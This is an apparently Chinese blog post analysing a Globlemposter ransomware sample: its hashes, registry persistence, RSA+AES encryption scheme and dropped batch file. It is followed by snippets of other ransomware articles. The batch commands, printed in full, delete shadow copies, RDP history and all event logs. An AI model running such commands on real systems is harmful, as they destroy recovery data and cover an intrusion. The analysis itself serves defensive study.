Globlemposter勒索病毒变种样本

一．样本概况

1、样本信息

样本来源：http://www.malware-traffic-analysis.net/2017/12/04/index.html

Kaspersky，NOD32，360均报毒：

MD5: 2908715EEC754ABA1AD21414B23CAFB6

SHA1: 4AF27F4B95F29F877D0ABB1167E6B1148C1849BD

CRC32: 64CAEB77

2、测试环境及工具

系统环境：win7_7600_x86

工具：

3、病毒行为

进行勒索：

文件加密：

文件加密为.doc后缀。

删除键值项：

二、具体行为分析

1、特征

Globlemposter家族病毒有两个主要的特征：

ShellCode执行和 PE文件释放执行。

1.1、拷贝执行ShellCode

内部采用TEA算法加密ShellCode：

1.2、Pe文件释放执行

Dump下来的ShellCode，修改0x400000属性为可执行，并释放了PE文件，跳到OEP执行。

2、行为

把PE文件 dump下来分析，先列出其它行为。

2.1、修改注册表开机启动

复制文件，目录：C:\Users\15pb-win7\AppData\Roaming\PE.exe

设置启动项，键值：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\BrowserUpdateCheck

1.2、创建.bat文件删除信息

在Temp目录下创建.bat文件，运行.bat文件分别删除卷影、RDP连接历史记录、日志信息。

@echo off

vssadmin.exe Delete Shadows /All /Quiet

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f

reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"

cd %userprofile%\documents\

attrib Default.rdp -s -h

del Default.rdp

for /F "tokens=*" %1 in (‘wevtutil.exe el‘) DO wevtutil.exe cl "%1"

2.3、自删除

cmd 执行 /c del C:\Users\15pb-win7\Desktop\PE.exe 自删除。

3、文件加密

勒索病毒重点在于加密文件，所以重点对加密文件流程进行分析。

3.1、加密方式

病毒采用的是RSA+AES的加密方式。

一般RSA与AES结合：

病毒变相的RSA与AES结合：

共有两对RSA公私钥：hac_pri 和 hac_pub，user_pri 和 user_pub。

加密文件的AES密钥。

用户ID：包含user_pri。

secret_Ekey：包含secret_key，跟解密的AES有关。

解密过程：

黑客拿到文件后，可以提取用户ID 和 secret_Ekey。用自身的hac_pri解密用户ID得到user_pri。再用user_pri解密secret_Ekey得到secret_key。

计算文件的IV参数，结合secret_key计算即可得到AES密钥，用以解密文件。

3.2、用户ID生成

hack_pub加密成哈希值生成用户ID，并做为FileName，创建文件在目录下。

目录：C:\Users\Public\AE09C984DF6E74640B3271EADB5DD7C65FDE806235B2CDA478E0EFA9129C09E7

哈希值：AE 09 C9 84 DF 6E 74 64 0B 32 71 EA DB 5D D7 C6 5F DE 80 62 35 B2 CD A4 78 E0 EF A9 12 9C 09 E7

hack_pub：

加密成hash：

创建文件：

3.3、加密文件

创建线程加密文件：

遍历文件：

IV参数：

AES密钥：

加密 secret_key，并将 secret_Ekey 和用户ID 写进文件。

三、恶意程序对用户造成的危害

四、解决方案(或总结)

3.1 提取病毒的特征，利用杀毒软件查杀

特征包括：网络ip，字符串等等

3.2 手工查杀步骤或是工具查杀步骤或是查杀思路等。

参考文献

致谢

15pb全体教师，以及教导我的所有人。

KID

原文地址：https://www.cnblogs.com/KIDofot/p/9068205.html

时间： 2025-01-18 00:28:35

Globlemposter勒索病毒变种样本的相关文章

勒索病毒Satan变种来袭目标锁定Windows、Linux用户

作为2018年度最为活跃的勒索病毒之一,Satan(撒旦)进入2019年之后持续更新迭代病毒,不断出现病毒变种,企图攫取更多利益.近日,腾讯安全御见威胁情报中心监测发现Satan勒索病毒变种样本.据了解,该病毒变种主要针对Windows.Linux系统用户进行无差别***,然后在中招电脑中植入勒索病毒勒索比特币和植入挖矿***挖矿门罗币,严重威胁用户个人信息及财产安全. Satan病毒变种运行后,病毒作者会快速遍历文件并进行加密,生成后缀为.evopro的加密文件,并提示用户支付一个比特币(当前

ITLOCK勒索病毒删除及数据库恢复

近日,安全实验室截获了Matrix勒索病毒itlock变种样本.该病毒通过RDP爆破,在成功后,还将进行内网共享文件夹扫描,对内网主机进行感染.Matrix勒索病毒变种采用RSA + Salsa20加密算法分别对密钥和文件进行加密.此外,病毒还将搜集计算机信息上传至C2服务器.据悉,已有大量主机受到感染,其中不乏政企单位. 勒索邮箱: rescompany19@qq.com rescompany19@yahoo.com rescompany19@cock.liC2域名:testercmd.in影

Windows勒索病毒防范、解决方法全攻略

[防御措施建议] 1.安装杀毒软件,保持安全防御功能开启,比如金山毒霸已可拦截(下载地址http://www.duba.net),微软自带的Windows Defender也可以. 2.打开Windows Update自动更新,及时升级系统. 微软在3月份已经针对NSA泄漏的漏洞发布了MS17-010升级补丁,包括本次被敲诈者蠕虫病毒利用的"永恒之蓝"漏洞,同时针对停止支持的Windows XP.Windows Server 2003.Windows 8也发布了专门的修复补丁. 最新版

U-Mail邮件网关测试勒索病毒样例图

俗话说得好,"患难见真情",也就是说平时看上去山盟海誓甜言蜜语,但一到危机关头各自飞了:同样的,日常上网看到各种平台言之凿凿的夸下海口说自己的平台固若金汤,对病毒防范一级棒,但最近勒索病毒一来,就纷纷将这些软件.平台打回原形,一个个的防线就像豆腐渣,不堪一击. 所谓"真金不怕火炼",一直有许多朋友担心U-Mail邮箱使用不安全,事实上如何呢?小编敢夸口:只要你安装了U-Mail邮件网关,则可确保高枕无忧.空口无凭,有图为证: 首先尝试一下直面勒索病毒的攻击吧,从网上

U-Mail邮件网关过滤勒索病毒测试报告

俗话说得好,“患难见真情”,也就是说平时看上去山盟海誓甜言蜜语,但一到危机关头各自飞了:同样的,日常上网看到各种平台言之凿凿的夸下海口说自己的平台固若金汤,对病毒防范一级棒,但最近勒索病毒一来,就纷纷将这些软件.平台打回原形,一个个的防线就像豆腐渣,不堪一击. 所谓“真金不怕火炼”,一直有许多朋友担心U-Mail邮箱使用不安全,事实上如何呢?小编敢夸口:只要你安装了U-Mail邮件网关,则可确保高枕无忧.空口无凭,有图为证: 首先尝试一下直面勒索病毒的攻击吧,从网上找来一个勒索病毒的样本: 接着

.Lucky后缀勒索病毒数据解密

近日,勒索病毒.lucky加密后缀,是新的勒索病毒变种,其传播模块复用了Satan的传播方式,实现了Linux下的自动化传播,我们将其命名为lucky勒索病毒. ***流程: 传播模块: conn与Satan的传播模块一致,跟Windows版本一样,主要利用以下漏洞进行***: 1.JBoss反序列化漏洞(CVE-2013-4810) 2.JBoss默认配置漏洞(CVE-2010-0738) 3.Tomcat任意文件上传漏洞(CVE-2017-12615) 4.Tomcat web管理后台弱口令

勒索病毒GandCrabV5.0.3最新变种来袭

GandCrab勒索病毒于2018年1月首次出现,在半年的时候之内,迅速发展,短短几个月时间里就出现了V1.0,V2.0,V3.0,V4.0等几个大的版本更新,V4.0之后又出现了V4.1,V4.2,V4.3,V4.4等几个小版本的变种样本,最近又发现它的最新变种GandCrabV5.0版本的变种样本.GandCrab的感染方式主要是通过以下几种方式:(1)?RDP爆破(2)?垃圾邮件,带有恶意链接或附件(3)?下载捆绑有恶意程序的正常软件(4)?利用Exploit Kit等漏洞利用工具包此次发

GANDCRAB V5.2勒索病毒新变种http://gandcrabmfe6mnef.onion

GANDCRAB V5.2勒索病毒新变种http://gandcrabmfe6mnef.onion 请大家做好防御措施 ---= GANDCRAB V5.2 =--- UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED *****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION

高危预警：针对财务系统的Globelmposterb 5.0变种勒索病毒

近日,安全团队(公众号:网安众安)发现针对财务系统的勒索病毒Globelmposterb新变种5.0已呈蔓延趋势,该病毒会针对目前国内广泛应用的财务系统及财务管理软件默认端口5366(详见下图),受此病毒影响的系统,数据库文件被加密,且扩展名变成"Benjamin_Jack2811@aol.com",目前国内多家公司财务系统已中招,并且有愈演愈烈的趋势,望广大用户做好安全防护,警惕Globelmposter 5.0勒索.Globelmposter的演变勒索病毒Globelmposter